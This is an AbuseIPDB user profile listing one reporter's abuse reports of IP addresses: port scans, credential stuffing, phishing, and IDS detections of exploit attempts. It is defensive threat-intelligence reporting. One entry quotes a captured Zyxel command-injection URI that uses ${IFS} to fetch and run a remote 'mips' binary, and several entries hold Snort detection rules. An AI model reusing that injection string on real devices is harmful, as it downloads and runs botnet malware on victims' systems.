Nathan Davalos - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Nathan Davalos joined AbuseIPDB in August 2020 and has reported 48 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇺🇸 104.152.222.104	26 Jan 2026	SERVER-WEBAPP React Server Components remote code execution attempt (1:65554:1)	Hacking Web App Attack
🇩🇪 213.165.83.222	03 Sep 2025	~4k port probes	Port Scan Hacking Brute-Force Web App Attack
🇨🇦 199.167.138.161	14 Nov 2024	approx 196,553 port probes in 24 hour period	Port Scan
🇺🇸 136.57.73.81	21 Oct 2024	port scan tcp 2002 through tcp 2008	Port Scan
🇪🇪 195.50.242.110	03 Jul 2024	Xctdoor malware	Hacking Exploited Host Web App Attack
🇺🇸 3.14.147.37	18 Apr 2024	1377 probes for ports: 3111 / tcp, 3952 / tcp, 43 (nicname) / tcp, 6998 / tcp, 8182 / tcp, 8291 / tc ... show more 1377 probes for ports: 3111 / tcp, 3952 / tcp, 43 (nicname) / tcp, 6998 / tcp, 8182 / tcp, 8291 / tcp, 9990 / tcp show less	Port Scan
🇺🇸 3.14.147.37	17 Apr 2024	6358 port scans in 24hr period for ports: 143 (imap) / tcp, 1650 / tcp, 1723 / tcp, 1981 / tcp, 205 ... show more 6358 port scans in 24hr period for ports: 143 (imap) / tcp, 1650 / tcp, 1723 / tcp, 1981 / tcp, 20547 / tcp, 2443 / tcp, 3051 / tcp, 3101 / tcp, 43 (nicname) / tcp, 51 (la-maint) / tcp, 548 (afpovertcp) / tcp, 631 / tcp, 6503 / tcp, 6998 / tcp, 80 (http) / tcp, 8086 / tcp, 8110 / tcp, 8513 / tcp, 8802 / tcp, 8807 / tcp, 8830 / tcp, 8840 / tcp, 8859 / tcp, 8874 / tcp, 9019 / tcp, 9026 / tcp, 9418 / tcp Please start reporting all abuse to Amazon: [email protected] show less	Port Scan
🇫🇮 65.108.206.218	24 Mar 2024	Scam text messages for site: tollwayservices.com	Phishing
🇺🇸 47.89.164.100	20 Nov 2023	2953 port probes	Port Scan
🇬🇧 78.141.247.61	20 Nov 2023	4893 port probes over the course of 2 days	Port Scan
🇺🇸 167.71.30.111	13 Nov 2023	MALWARE-CNC inbound implant communication attempt (3:62528:2)	Hacking
🇺🇸 205.234.239.54	09 Nov 2023	172495 port scans for various services.	Port Scan Hacking
🇬🇧 103.13.209.109	27 Oct 2023	credential stuffing m365	Hacking Brute-Force Web App Attack
🇳🇱 195.78.54.68	27 Oct 2023	credential stuffing m365	Hacking Brute-Force Web App Attack
🇺🇸 3.230.76.108	25 Oct 2023	~20k port scans for tcp ports: 10002, 10100, 10200, 110 (pop3), 1337, 143 (imap), 2083, 2087, 21 (ft ... show more ~20k port scans for tcp ports: 10002, 10100, 10200, 110 (pop3), 1337, 143 (imap), 2083, 2087, 21 (ftp), 22 (ssh), 23431, 28888, 3030, 3081, 3389, 38888, 39412, 443 (https), 4433, 444 (snpp), 4443, 4444, 45621, 465 (smtps), 4682, 4823, 5001, 50050, 5006, 5060, 5228, 5432, 54323, 56431, 56432, 587 (submission), 5892, 64123, 6443, 7429, 7443, 80 (http), 8080, 8081, 8181, 8443, 8847, 8889, 993 (imaps), 995 (pop3s) show less	Port Scan
🇺🇸 23.220.32.64	23 Oct 2023	(http_inspect) HTTP header line exceeds maximum_header_length option bytes (119:19:3)	Hacking Web App Attack
🇺🇸 167.71.30.111	18 Oct 2023	Kryptos Logic telltale scanner CVE-2023-20198 Exploit attempt (Web User Interface (Web UI) feature ... show more Kryptos Logic telltale scanner CVE-2023-20198 Exploit attempt (Web User Interface (Web UI) feature of Cisco IOS XE software): Message: MALWARE-CNC inbound implant communication attempt (3:62528:2) Time: 2023-10-18 04:35:43 Priority: high Source IP: 167.71.30.111 Source Port / ICMP Type: 51018 / tcp Source Country: United States Destination Port / ICMP Code: 80 (http) / tcp HTTP URI /webui/logoutconfirm.html?logon_hash=1 Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-CNC inbound implant communication attempt"; sid:62528; gid:3; rev:2; classtype:trojan-activity; reference:url,blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/; metadata:engine shared, soid 3\|62528, service http, policy balanced-ips drop, policy connectivity-ips drop, policy max-detect-ips drop, policy security-ips drop, impact_flag red; ) show less	Hacking Web App Attack IoT Targeted
🇺🇸 167.71.30.111	18 Oct 2023	CVE-2023-20198 Exploit attempt (Web User Interface (Web UI) feature of Cisco IOS XE software): Me ... show more CVE-2023-20198 Exploit attempt (Web User Interface (Web UI) feature of Cisco IOS XE software): Message: MALWARE-CNC inbound implant communication attempt (3:62528:2) Time: 2023-10-18 04:35:43 Priority: high Source IP: 167.71.30.111 Source Port / ICMP Type 36348 / tcp Source Country United StatesUSA Destination Port / ICMP Code: 80 (http) / tcp HTTP URI /webui/logoutconfirm.html?logon_hash=1 Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-CNC inbound implant communication attempt"; sid:62528; gid:3; rev:2; classtype:trojan-activity; reference:url,blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/; metadata:engine shared, soid 3\|62528, service http, policy balanced-ips drop, policy connectivity-ips drop, policy max-detect-ips drop, policy security-ips drop, impact_flag red; ) show less	Hacking Web App Attack IoT Targeted
🇺🇸 69.126.234.71	09 Oct 2023	HTTP URI /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.110.33.1 ... show more HTTP URI /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep; show less	Hacking Web App Attack
🇺🇸 68.183.154.115	20 Sep 2023	155176+ port probes over 24 hours	Port Scan
🇺🇸 184.60.77.226	02 Feb 2023	SERVER-WEBAPP Dell SonicWall GMS set_time_config XMLRPC method command injection attempt (1:39743:3) ... show more SERVER-WEBAPP Dell SonicWall GMS set_time_config XMLRPC method command injection attempt (1:39743:3) SERVER-WEBAPP DrayTek multiple products command injection attempt (1:53589:2) SERVER-WEBAPP GPON Router authentication bypass and command injection attempt (1:46624:2) SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3) SERVER-WEBAPP DD-WRT httpd cgi-bin remote command execution attempt (1:26275:5) SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt (1:42857:3) SERVER-WEBAPP ZyXEL TR-064 SetNTPServers command injection attempt (1:40784:4) SERVER-WEBAPP Linksys E-series HNAP TheMoon remote code execution attempt (1:29831:3) show less	Port Scan Hacking Brute-Force IoT Targeted
🇺🇸 20.124.70.171	09 Sep 2022	Snort detection: SERVER-WEBAPP MVPower DVR Shell arbitrary command execution attempt (1:42857:3)	Hacking
🇪🇸 82.102.26.158	24 Jun 2022	~20129 port scans within 24hr period	Port Scan Hacking
🇺🇸 69.64.32.12	23 Jun 2022	SERVER-WEBAPP PHPUnit PHP remote code execution attempt (1:45749:2)	Hacking Web App Attack
🇺🇸 192.64.83.198	15 Jun 2022	6k scans for 4200 / tcp	Port Scan